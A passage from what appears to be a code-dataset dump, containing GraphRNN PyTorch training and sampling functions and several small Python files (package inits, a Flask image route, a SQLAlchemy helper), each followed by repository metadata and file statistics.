fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
fname_output = args.nll_save_path + args.note + '_' + args.graph_type + '.csv'
with open(fname_output, 'w+') as f:
f.write(str(graph_validate_len)+','+str(graph_test_len)+'\n')
f.write('train,test\n')
for iter in range(max_iter):
print(iter)
if 'GraphRNN_MLP' in args.note:
nll_train = train_mlp_forward_epoch(epoch, args, rnn, output, dataset_train)
nll_test = train_mlp_forward_epoch(epoch, args, rnn, output, dataset_test)
if 'GraphRNN_RNN' in args.note:
nll_train = train_rnn_forward_epoch(epoch, args, rnn, output, dataset_train)
nll_test = train_rnn_forward_epoch(epoch, args, rnn, output, dataset_test)
print('train',nll_train,'test',nll_test)
f.write(str(nll_train)+','+str(nll_test)+'\n')
print('NLL evaluation done')
def train_vae_epoch(epoch, args, rnn, output, data_loader,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
x = Variable(x).to(device)
y = Variable(y).to(device)
# if using ground truth to train
h = rnn(x, pack=True, input_len=y_len)
y_pred,z_mu,z_lsgms = output(h)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
z_mu = pack_padded_sequence(z_mu, y_len, batch_first=True)
z_mu = pad_packed_sequence(z_mu, batch_first=True)[0]
z_lsgms = pack_padded_sequence(z_lsgms, y_len, batch_first=True)
z_lsgms = pad_packed_sequence(z_lsgms, batch_first=True)[0]
# use cross entropy loss
loss_bce = binary_cross_entropy_weight(y_pred, y)
loss_kl = -0.5 * torch.sum(1 + z_lsgms - z_mu.pow(2) - z_lsgms.exp())
loss_kl /= y.size(0)*y.size(1)*sum(y_len) # normalize
loss = loss_bce + loss_kl
loss.backward()
# update deterministic and lstm
optimizer_output.step()
optimizer_rnn.step()
scheduler_output.step()
scheduler_rnn.step()
z_mu_mean = torch.mean(z_mu.data)
z_sgm_mean = torch.mean(z_lsgms.mul(0.5).exp_().data)
z_mu_min = torch.min(z_mu.data)
z_sgm_min = torch.min(z_lsgms.mul(0.5).exp_().data)
z_mu_max = torch.max(z_mu.data)
z_sgm_max = torch.max(z_lsgms.mul(0.5).exp_().data)
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train bce loss: {:.6f}, train kl loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,loss_bce.data[0], loss_kl.data[0], args.graph_type, args.num_layers, args.hidden_size_rnn))
print('z_mu_mean', z_mu_mean, 'z_mu_min', z_mu_min, 'z_mu_max', z_mu_max, 'z_sgm_mean', z_sgm_mean, 'z_sgm_min', z_sgm_min, 'z_sgm_max', z_sgm_max)
# logging
log_value('bce_loss_'+args.fname, loss_bce.data[0], epoch*args.batch_ratio+batch_idx)
log_value('kl_loss_' +args.fname, loss_kl.data[0], epoch*args.batch_ratio + batch_idx)
log_value('z_mu_mean_'+args.fname, z_mu_mean, epoch*args.batch_ratio + batch_idx)
log_value('z_mu_min_'+args.fname, z_mu_min, epoch*args.batch_ratio + batch_idx)
log_value('z_mu_max_'+args.fname, z_mu_max, epoch*args.batch_ratio + batch_idx)
log_value('z_sgm_mean_'+args.fname, z_sgm_mean, epoch*args.batch_ratio + batch_idx)
log_value('z_sgm_min_'+args.fname, z_sgm_min, epoch*args.batch_ratio + batch_idx)
log_value('z_sgm_max_'+args.fname, z_sgm_max, epoch*args.batch_ratio + batch_idx)
loss_sum += loss.data[0]
return loss_sum/(batch_idx+1)
def test_vae_epoch(epoch, args, rnn, output, test_batch_size=16, save_histogram=False, sample_time = 1):
rnn.hidden = rnn.init_hidden(test_batch_size)
rnn.eval()
output.eval()
# generate graphs
max_num_node = int(args.max_num_node)
y_pred = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # normalized prediction score
y_pred_long = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # discrete prediction
x_step = Variable(torch.ones(test_batch_size,1,args.max_prev_node)).to(device)
for i in range(max_num_node):
h = rnn(x_step)
y_pred_step, _, _ = output(h)
y_pred[:, i:i + 1, :] = F.sigmoid(y_pred_step)
x_step = sample_sigmoid(y_pred_step, sample=True, sample_time=sample_time)
y_pred_long[:, i:i + 1, :] = x_step
rnn.hidden = Variable(rnn.hidden.data).to(device)
y_pred_data = y_pred.data
y_pred_long_data = y_pred_long.data.long()
# save graphs as pickle
G_pred_list = []
for i in range(test_batch_size):
adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
G_pred = get_graph(adj_pred) # get a graph from zero-padded adj
G_pred_list.append(G_pred)
# save prediction histograms, plot histogram over each time step
# if save_histogram:
# save_prediction_histogram(y_pred_data.cpu().numpy(),
# fname_pred=args.figure_prediction_save_path+args.fname_pred+str(epoch)+'.jpg',
# max_num_node=max_num_node)
return G_pred_list
def test_vae_partial_epoch(epoch, args, rnn, output, data_loader, save_histogram=False,sample_time=1):
rnn.eval()
output.eval()
G_pred_list = []
for batch_idx, data in enumerate(data_loader):
x = data['x'].float()
y = data['y'].float()
y_len = data['len']
test_batch_size = x.size(0)
rnn.hidden = rnn.init_hidden(test_batch_size)
# generate graphs
max_num_node = int(args.max_num_node)
y_pred = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # normalized prediction score
y_pred_long = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # discrete prediction
x_step = Variable(torch.ones(test_batch_size,1,args.max_prev_node)).to(device)
for i in range(max_num_node):
print('finish node',i)
h = rnn(x_step)
y_pred_step, _, _ = output(h)
y_pred[:, i:i + 1, :] = F.sigmoid(y_pred_step)
x_step = sample_sigmoid_supervised(y_pred_step, y[:,i:i+1,:].to(device), current=i, y_len=y_len, sample_time=sample_time)
y_pred_long[:, i:i + 1, :] = x_step
rnn.hidden = Variable(rnn.hidden.data).to(device)
y_pred_data = y_pred.data
y_pred_long_data = y_pred_long.data.long()
# save graphs as pickle
for i in range(test_batch_size):
adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
G_pred = get_graph(adj_pred) # get a graph from zero-padded adj
G_pred_list.append(G_pred)
return G_pred_list
def train_mlp_epoch(epoch, args, rnn, output, data_loader,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
x = Variable(x).to(device)
y = Variable(y).to(device)
h = rnn(x, pack=True, input_len=y_len)
y_pred = output(h)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
# use cross entropy loss
loss = binary_cross_entropy_weight(y_pred, y)
loss.backward()
# update deterministic and lstm
optimizer_output.step()
optimizer_rnn.step()
scheduler_output.step()
scheduler_rnn.step()
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,loss.data[0], args.graph_type, args.num_layers, args.hidden_size_rnn))
# logging
log_value('loss_'+args.fname, loss.data[0], epoch*args.batch_ratio+batch_idx)
loss_sum += loss.data[0]
return loss_sum/(batch_idx+1)
def test_mlp_epoch(epoch, args, rnn, output, test_batch_size=16, save_histogram=False,sample_time=1):
rnn.hidden = rnn.init_hidden(test_batch_size)
rnn.eval()
output.eval()
# generate graphs
max_num_node = int(args.max_num_node)
y_pred = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # normalized prediction score
y_pred_long = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # discrete prediction
x_step = Variable(torch.ones(test_batch_size,1,args.max_prev_node)).to(device)
for i in range(max_num_node):
h = rnn(x_step)
y_pred_step = output(h)
y_pred[:, i:i + 1, :] = F.sigmoid(y_pred_step)
x_step = sample_sigmoid(y_pred_step, sample=True, sample_time=sample_time)
y_pred_long[:, i:i + 1, :] = x_step
rnn.hidden = Variable(rnn.hidden.data).to(device)
y_pred_data = y_pred.data
y_pred_long_data = y_pred_long.data.long()
# save graphs as pickle
G_pred_list = []
for i in range(test_batch_size):
adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
G_pred = get_graph(adj_pred) # get a graph from zero-padded adj
G_pred_list.append(G_pred)
# # save prediction histograms, plot histogram over each time step
# if save_histogram:
# save_prediction_histogram(y_pred_data.cpu().numpy(),
# fname_pred=args.figure_prediction_save_path+args.fname_pred+str(epoch)+'.jpg',
# max_num_node=max_num_node)
return G_pred_list
def test_mlp_partial_epoch(epoch, args, rnn, output, data_loader, save_histogram=False,sample_time=1):
rnn.eval()
output.eval()
G_pred_list = []
for batch_idx, data in enumerate(data_loader):
x = data['x'].float()
y = data['y'].float()
y_len = data['len']
test_batch_size = x.size(0)
rnn.hidden = rnn.init_hidden(test_batch_size)
# generate graphs
max_num_node = int(args.max_num_node)
y_pred = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # normalized prediction score
y_pred_long = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # discrete prediction
x_step = Variable(torch.ones(test_batch_size,1,args.max_prev_node)).to(device)
for i in range(max_num_node):
print('finish node',i)
h = rnn(x_step)
y_pred_step = output(h)
y_pred[:, i:i + 1, :] = F.sigmoid(y_pred_step)
x_step = sample_sigmoid_supervised(y_pred_step, y[:,i:i+1,:].to(device), current=i, y_len=y_len, sample_time=sample_time)
y_pred_long[:, i:i + 1, :] = x_step
rnn.hidden = Variable(rnn.hidden.data).to(device)
y_pred_data = y_pred.data
y_pred_long_data = y_pred_long.data.long()
# save graphs as pickle
for i in range(test_batch_size):
adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
G_pred = get_graph(adj_pred) # get a graph from zero-padded adj
G_pred_list.append(G_pred)
return G_pred_list
def test_mlp_partial_simple_epoch(epoch, args, rnn, output, data_loader, save_histogram=False,sample_time=1):
rnn.eval()
output.eval()
G_pred_list = []
for batch_idx, data in enumerate(data_loader):
x = data['x'].float()
y = data['y'].float()
y_len = data['len']
test_batch_size = x.size(0)
rnn.hidden = rnn.init_hidden(test_batch_size)
# generate graphs
max_num_node = int(args.max_num_node)
y_pred = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # normalized prediction score
y_pred_long = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # discrete prediction
x_step = Variable(torch.ones(test_batch_size,1,args.max_prev_node)).to(device)
for i in range(max_num_node):
print('finish node',i)
h = rnn(x_step)
y_pred_step = output(h)
y_pred[:, i:i + 1, :] = F.sigmoid(y_pred_step)
x_step = sample_sigmoid_supervised_simple(y_pred_step, y[:,i:i+1,:].to(device), current=i, y_len=y_len, sample_time=sample_time)
y_pred_long[:, i:i + 1, :] = x_step
rnn.hidden = Variable(rnn.hidden.data).to(device)
y_pred_data = y_pred.data
y_pred_long_data = y_pred_long.data.long()
# save graphs as pickle
for i in range(test_batch_size):
adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
G_pred = get_graph(adj_pred) # get a graph from zero-padded adj
G_pred_list.append(G_pred)
return G_pred_list
def train_mlp_forward_epoch(epoch, args, rnn, output, data_loader):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
x = Variable(x).to(device)
y = Variable(y).to(device)
h = rnn(x, pack=True, input_len=y_len)
y_pred = output(h)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
# use cross entropy loss
loss = 0
for j in range(y.size(1)):
# print('y_pred',y_pred[0,j,:],'y',y[0,j,:])
end_idx = min(j+1,y.size(2))
loss += binary_cross_entropy_weight(y_pred[:,j,0:end_idx], y[:,j,0:end_idx])*end_idx
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,loss.data[0], args.graph_type, args.num_layers, args.hidden_size_rnn))
# logging
log_value('loss_'+args.fname, loss.data[0], epoch*args.batch_ratio+batch_idx)
loss_sum += loss.data[0]
return loss_sum/(batch_idx+1)
'''
| 44.078415 | 159 | 0.644126 | 7,703 | 52,277 | 4.099442 | 0.062833 | 0.019761 | 0.017702 | 0.016531 | 0.822218 | 0.807809 | 0.789347 | 0.76832 | 0.760118 | 0.747704 | 0 | 0.011575 | 0.239819 | 52,277 | 1,185 | 160 | 44.115612 | 0.78304 | 0.112286 | 0 | 0.649412 | 0 | 0 | 0.026966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021176 | false | 0 | 0.065882 | 0 | 0.101176 | 0.028235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
edef1e9c6d0236f322fafd6972765be36664fc4f | 42 | py | Python | fastapi_rest_jsonapi/schema/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | 2 | 2022-03-01T00:59:04.000Z | 2022-03-03T06:17:51.000Z | fastapi_rest_jsonapi/schema/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | 9 | 2022-01-16T15:47:35.000Z | 2022-03-28T18:47:18.000Z | fastapi_rest_jsonapi/schema/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | null | null | null | # flake8: noqa
from .schema import Schema
| 14 | 26 | 0.761905 | 6 | 42 | 5.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.166667 | 42 | 2 | 27 | 21 | 0.885714 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b67cac7537bc838bfb0e42b9fb3630ec802ce194 | 51 | py | Python | gym_combat/gym_combat/envs/__init__.py | refaev/combat_gym | f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf | [
"MIT"
] | null | null | null | gym_combat/gym_combat/envs/__init__.py | refaev/combat_gym | f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf | [
"MIT"
] | null | null | null | gym_combat/gym_combat/envs/__init__.py | refaev/combat_gym | f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf | [
"MIT"
] | null | null | null | from gym_combat.envs.gym_combat import GymCombatEnv | 51 | 51 | 0.901961 | 8 | 51 | 5.5 | 0.75 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 51 | 1 | 51 | 51 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b67fe07d879c2c3850a4111203b74db8921c0a9e | 34 | py | Python | python/8Kyu/Remove first and last character.py | athasv/Codewars-data | 5e106466e709fd776f23585ad9f652d0d65b48d3 | [
"MIT"
] | null | null | null | python/8Kyu/Remove first and last character.py | athasv/Codewars-data | 5e106466e709fd776f23585ad9f652d0d65b48d3 | [
"MIT"
] | null | null | null | python/8Kyu/Remove first and last character.py | athasv/Codewars-data | 5e106466e709fd776f23585ad9f652d0d65b48d3 | [
"MIT"
] | null | null | null | def remove_char(s): return s[1:-1] | 34 | 34 | 0.705882 | 8 | 34 | 2.875 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0.088235 | 34 | 1 | 34 | 34 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | false | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
b687165252648db89777b1ccb079d554488bda21 | 315 | py | Python | app/gallery/__init__.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | app/gallery/__init__.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | app/gallery/__init__.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | from flask import Blueprint, send_from_directory
bp = Blueprint('content', __name__)
@bp.route('/<image_url>')
def main(image_url):
return send_from_directory('gallery\\gallery', image_url)
@bp.route('/user/<image_url>/')
def send_image(image_url):
return send_from_directory('gallery\\users', image_url) | 28.636364 | 61 | 0.752381 | 45 | 315 | 4.888889 | 0.4 | 0.218182 | 0.231818 | 0.163636 | 0.345455 | 0.345455 | 0.345455 | 0 | 0 | 0 | 0 | 0 | 0.098413 | 315 | 11 | 62 | 28.636364 | 0.774648 | 0 | 0 | 0 | 0 | 0 | 0.212025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.25 | 0.625 | 0.25 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
fce2f4f5ac32a7f34882383a96f610bb800a3c93 | 49 | py | Python | kespo/models/__init__.py | sergevkim/KeywordSpotting | 57c71a66178ccc4bd98bd355f37601f4d7f059b9 | [
"MIT"
] | null | null | null | kespo/models/__init__.py | sergevkim/KeywordSpotting | 57c71a66178ccc4bd98bd355f37601f4d7f059b9 | [
"MIT"
] | null | null | null | kespo/models/__init__.py | sergevkim/KeywordSpotting | 57c71a66178ccc4bd98bd355f37601f4d7f059b9 | [
"MIT"
] | null | null | null | from .attention_spotter import AttentionSpotter
| 16.333333 | 47 | 0.877551 | 5 | 49 | 8.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 49 | 2 | 48 | 24.5 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fced471e13815be5621dc72a5f2ff059358f1e2f | 134 | py | Python | web/sql.py | nonomal/oh-my-rss | 68b9284e0acaf44ea389d675b71949177f9f3256 | [
"MIT"
] | 270 | 2019-09-05T05:51:19.000Z | 2022-03-12T18:26:13.000Z | web/sql.py | nonomal/oh-my-rss | 68b9284e0acaf44ea389d675b71949177f9f3256 | [
"MIT"
] | 6 | 2019-09-06T03:52:47.000Z | 2021-04-10T06:21:14.000Z | web/sql.py | nonomal/oh-my-rss | 68b9284e0acaf44ea389d675b71949177f9f3256 | [
"MIT"
] | 37 | 2019-09-06T05:13:24.000Z | 2022-01-21T08:05:33.000Z |
# TODO 复杂的语句在这里
# JOB_STAT_SQL = "SELECT count(1) as c, dvc_id, status, id FROM web_job WHERE ctime > '%s' GROUP BY dvc_id, status;"
| 33.5 | 116 | 0.701493 | 25 | 134 | 3.56 | 0.8 | 0.11236 | 0.247191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009091 | 0.179104 | 134 | 3 | 117 | 44.666667 | 0.8 | 0.955224 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0.333333 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fcf070832b7b7c889a54b3c7a4ed17bb1ca8279e | 439 | py | Python | mmtfPyspark/datasets/__init__.py | sbliven/mmtf-pyspark | 3d444178bdc0d5128aafdb1326fec12b5d7634b5 | [
"Apache-2.0"
] | 59 | 2018-01-28T06:50:56.000Z | 2022-02-10T06:07:12.000Z | mmtfPyspark/datasets/__init__.py | sbliven/mmtf-pyspark | 3d444178bdc0d5128aafdb1326fec12b5d7634b5 | [
"Apache-2.0"
] | 101 | 2018-02-01T20:51:10.000Z | 2022-01-24T00:50:29.000Z | mmtfPyspark/datasets/__init__.py | sbliven/mmtf-pyspark | 3d444178bdc0d5128aafdb1326fec12b5d7634b5 | [
"Apache-2.0"
] | 29 | 2018-01-29T10:09:51.000Z | 2022-01-23T18:53:28.000Z | from . import advancedSearchDataset, customReportService, dataset_utils, dbPtmDataset, dbSnpDataset, drugBankDataset, g2sDataset, jpredDataset, myVariantDataset, \
pdbjMineDataset, pdbPtmDataset, pdbToUniProt, polymerSequenceExtractor, secondaryStructureElementExtractor, \
secondaryStructureExtractor, secondaryStructureSegmentExtractor, swissModelDataset, uniProt
from .groupInteractionExtractor import groupInteractionExtractor
| 87.8 | 163 | 0.872437 | 25 | 439 | 15.28 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002475 | 0.079727 | 439 | 4 | 164 | 109.75 | 0.943069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1e4d912b40ce92ffced889ea73de25c0a8b50ba2 | 31 | py | Python | betatree/__init__.py | neherlab/betatree | a36a56169ae778ba470c95c65c1eafb9de7fcbd7 | [
"MIT"
] | 1 | 2015-09-13T14:48:19.000Z | 2015-09-13T14:48:19.000Z | betatree/__init__.py | neherlab/betatree | a36a56169ae778ba470c95c65c1eafb9de7fcbd7 | [
"MIT"
] | null | null | null | betatree/__init__.py | neherlab/betatree | a36a56169ae778ba470c95c65c1eafb9de7fcbd7 | [
"MIT"
] | null | null | null | from .betatree import betatree
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
949a47780d25ec13d524d1207d06ad61d95ab580 | 142 | py | Python | src/common/dataset/persistence/engine.py | MichalPitr/fever-cs-dataset | 62a9a87eafcfa18abfe24c516ca7161e8e466d08 | [
"MIT"
] | 71 | 2019-01-11T21:07:32.000Z | 2021-07-10T17:59:33.000Z | src/common/dataset/persistence/engine.py | MichalPitr/fever-cs-dataset | 62a9a87eafcfa18abfe24c516ca7161e8e466d08 | [
"MIT"
] | 22 | 2019-02-20T13:42:28.000Z | 2022-02-09T23:29:32.000Z | src/common/dataset/persistence/engine.py | mithunpaul08/fever-baselines | 7b2a8f9f9b599e5a00e503db06400fca655ad106 | [
"Apache-2.0"
] | 21 | 2019-01-31T09:05:30.000Z | 2021-05-26T10:37:13.000Z | from sqlalchemy import create_engine
def get_engine(file):
return create_engine('sqlite:///data/fever/{0}.db'.format(file), echo=False)
| 23.666667 | 80 | 0.746479 | 21 | 142 | 4.904762 | 0.809524 | 0.23301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.105634 | 142 | 5 | 81 | 28.4 | 0.80315 | 0 | 0 | 0 | 0 | 0 | 0.190141 | 0.190141 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
94cee786149639c3da0beaf500ed4cda8e8f2fdf | 23 | py | Python | pkgs/conf-pkg/src/genie/libs/conf/routing/__init__.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/conf-pkg/src/genie/libs/conf/routing/__init__.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/conf-pkg/src/genie/libs/conf/routing/__init__.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | from .routing import *
